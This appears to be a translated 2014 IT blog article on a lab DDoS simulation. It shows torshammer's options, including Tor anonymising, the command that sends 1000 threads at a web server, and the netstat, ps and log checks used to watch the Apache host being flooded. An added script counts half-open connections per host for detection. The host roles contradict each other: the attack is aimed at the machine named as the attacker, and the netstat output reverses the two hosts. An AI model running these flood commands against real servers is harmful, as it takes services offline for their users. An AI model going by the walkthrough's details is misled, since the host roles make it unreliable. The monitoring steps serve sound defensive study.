
DDoS Attack Simulation Test

Time: 2014-12-10 23:50  Source: www.it.net.cn  Author: IT网

1. Host launching the DDoS attack: 192.168.0.13
2. Host receiving the DDoS attack: 192.168.0.18

I. The host launching the DDoS attack
Host IP: 192.168.0.13
1. Use the torshammer tool for the simulation

./torshammer.py -h  # show the usage help
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
-t|--target <Hostname|IP>
-r|--threads <Number of threads> Defaults to 256
-p|--port <Web Server Port> Defaults to 80
-T|--tor Enable anonymising through tor on 127.0.0.1:9050
-h|--help Shows this help
Eg. ./torshammer.py -t 192.168.1.100 -r 256

 

2. Launch the DDoS attack against 192.168.0.13

./torshammer.py -t 192.168.0.13 -r 1000

II. The host under attack
Host IP: 192.168.0.18
Web: apache+php

1. Check the network connection state

sudo netstat -n -t | grep SYN_RECV | grep :80  # a large number of SYN_RECV entries show up
tcp        0      0 192.168.0.13:80         192.168.0.18:52505      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:49423      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:41616      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:43046      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:47337      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:33997      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:33155      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:37627      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:53313      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:43530      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:54954      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:52878      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:55284      SYN_RECV  
tcp        0      0 192.168.0.13:80         192.168.0.18:60586      SYN_RECV  
........
........

 

# Count the SYN_RECV entries

sudo netstat -n -t | grep SYN_RECV | grep :80 | wc -l
29

 

# List the host IPs that originate the SYN_RECV entries

sudo netstat -ntu | grep SYN_RECV | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
128 192.168.0.18

 

# Watch the network connection state of 192.168.0.18 in real time

sudo watch -n 1 "netstat -n -t | grep 192.168.0.18"
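
The netstat pipelines above, turned into a reusable check (an added example, not part of the original article): `grep :80` also matches ports such as 8080 and remote ports, and `cut -d: -f1` truncates IPv6 addresses, so this version matches the local port exactly and splits on the last colon. The function names, the threshold and the sample input are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: count half-open (SYN_RECV) connections per remote host
# from `netstat -n -t` output on stdin and flag hosts over a threshold.
#   $1 = local port to watch, $2 = alert threshold (assumed values)
syn_recv_report() {
    awk -v port="$1" -v threshold="$2" '
        # netstat columns: proto recv-q send-q local foreign state
        $1 ~ /^tcp/ && $6 == "SYN_RECV" {
            # Split on the LAST colon: IPv6 addresses stay intact and
            # port 80 cannot match 8080 or a remote port.
            lport = $4; sub(/^.*:/, "", lport)
            if (lport != port) next
            host = $5; sub(/:[^:]*$/, "", host)
            count[host]++
        }
        END {
            for (h in count) {
                status = (count[h] >= threshold) ? "ALERT" : "ok"
                printf "%s %d %s\n", h, count[h], status
            }
        }
    ' | sort -k2,2nr -k1,1
}

# Constructed sample input (not captured from the hosts in the article).
sample_netstat() {
    cat <<'EOF'
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.0.13:80         192.168.0.18:52505      SYN_RECV
tcp        0      0 192.168.0.13:80         192.168.0.18:49423      SYN_RECV
tcp        0      0 192.168.0.13:80         192.168.0.18:41616      SYN_RECV
tcp        0      0 192.168.0.13:8080       192.168.0.18:43046      SYN_RECV
tcp        0      0 192.168.0.13:80         192.168.0.20:47337      ESTABLISHED
tcp6       0      0 2001:db8::10:80         2001:db8::99:40000      SYN_RECV
EOF
}

# Report for port 80 with an alert threshold of 3 half-open connections.
sample_netstat | syn_recv_report 80 3
```

On a live host the same function reads real data, for example `sudo netstat -n -t | syn_recv_report 80 100`, with the threshold tuned to the server's normal load.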

 

2. Check the apache processes

sudo ps -efl | grep apache2
1 S root      9936     1  0  80   0 - 26434 poll_s 11:30 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9940  9936  0  80   0 - 26714 poll_s 11:30 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9941  9936  0  80   0 - 26581 poll_s 11:30 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9942  9936  0  80   0 - 26687 poll_s 11:30 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9943  9936  0  80   0 - 26712 poll_s 11:30 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9944  9936  0  80   0 - 26581 poll_s 11:30 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9996  9936  0  80   0 - 26581 poll_s 11:31 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9997  9936  0  80   0 - 26714 poll_s 11:31 ?        00:00:00 /usr/sbin/apache2 -k start
5 S www-data  9998  9936  0  80   0 - 26611 poll_s 11:31 ?        00:00:00 /usr/sbin/apache2 -k start
......
......

 

 
sudo ps -efl | grep apache2 | wc -l  # 152 apache processes have been started
152

 

3. The apache access log file is also growing quickly

watch -n 1 ls -hl /var/log/apache2/access.log

tail -f /var/log/apache2/access.log

 

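4. The website on 192.168.0.18 opened slowly at first, and later could not be opened at all.
I don't know what happened, but when I started launching the DDoS attack against my laptop, it caused the laptop to freeze.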


 

(Editor in charge: IT)